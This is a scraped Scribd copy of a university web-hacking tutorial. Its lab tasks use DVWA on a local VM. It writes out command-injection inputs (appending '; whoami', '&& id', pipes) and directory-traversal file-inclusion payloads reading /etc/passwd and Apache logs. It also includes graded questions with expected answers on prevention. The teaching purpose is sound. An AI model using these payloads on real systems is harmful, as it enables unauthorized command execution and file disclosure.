Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
19 views2 pages

Tutorial 6

The document outlines a Week 6 tutorial focused on web hacking, specifically targeting command injection and local file inclusion vulnerabilities using DVWA and Kali Linux. It provides detailed lab tasks for exploiting these vulnerabilities and includes instructions for capturing and modifying HTTP requests. Additionally, the tutorial poses questions regarding the differences between command injection and SQL injection, prevention methods for LFI vulnerabilities, and the implications of improper error handling in web applications.

Uploaded by

Junaid Akram
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
19 views2 pages

Tutorial 6

The document outlines a Week 6 tutorial focused on web hacking, specifically targeting command injection and local file inclusion vulnerabilities using DVWA and Kali Linux. It provides detailed lab tasks for exploiting these vulnerabilities and includes instructions for capturing and modifying HTTP requests. Additionally, the tutorial poses questions regarding the differences between command injection and SQL injection, prevention methods for LFI vulnerabilities, and the implications of improper error handling in web applications.

Uploaded by

Junaid Akram
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Week 6 Tutorial – Web Hacking II (Lab Tasks + Questions)

Lab Task 1: Exploiting Command Injection Vulnerability


Objective: Understand and exploit command injection flaws in a web application.
Lab Environment:
 DVWA (Damn Vulnerable Web Application) set to Medium or High security level
 Kali Linux with Burp Suite and browser
Instructions:
1. Open DVWA in your browser and log in.
2. Navigate to “Command Injection” module.
3. Enter 127.0.0.1 and observe the output.
4. Now attempt to inject a command by adding ; whoami or && id at the end of the
input.
5. Capture the HTTP request in Burp Suite.
6. Modify and repeat the request with variations to test different injection payloads.
7. Record the results and note the successful payloads.
8. Try using piping (|) and background execution (&) operators.
Expected Outcome:
Students should be able to execute OS-level commands via the web input and confirm that
output is returned to the browser.

Lab Task 2: File Inclusion Vulnerability (LFI)


Objective:
Demonstrate exploitation of a Local File Inclusion (LFI) vulnerability.
Lab Environment:
 DVWA or Mutillidae running on local VM
 Kali Linux with browser
Instructions:
1. Navigate to the File Inclusion section in DVWA.
2. Test default input (e.g., ?page=include.php) and change it to
?page=../../../../etc/passwd.
3. Try different traversal payloads to read system files:
o ?page=../../../../etc/hosts
o ?page=../../../../var/log/apache2/access.log
4. Attempt to include a PHP file containing malicious code (if permitted in
environment).
5. Use Burp Suite to analyze the server response headers and content.
Expected Outcome:
Students should successfully read restricted system files using directory traversal. They
should recognize how improper input validation leads to file disclosure.

Tutorial Questions:
1. What are the key differences between Command Injection and SQL Injection
vulnerabilities? Provide examples of each.
(Expected answer: Command Injection targets the OS, SQLi targets the database.
Examples should include payloads.)
2. How can developers prevent Local File Inclusion (LFI) vulnerabilities in PHP
applications?
(Expected answer: Input sanitization, whitelisting file names, disabling dynamic
includes, using absolute paths, etc.)
3. Explain the security implications of improper error handling in web applications,
especially in the context of web hacking. Provide an example from your lab.
(Expected answer: Error messages can reveal file paths, database types, system info.
Example: LFI errors showing file not found.)

You might also like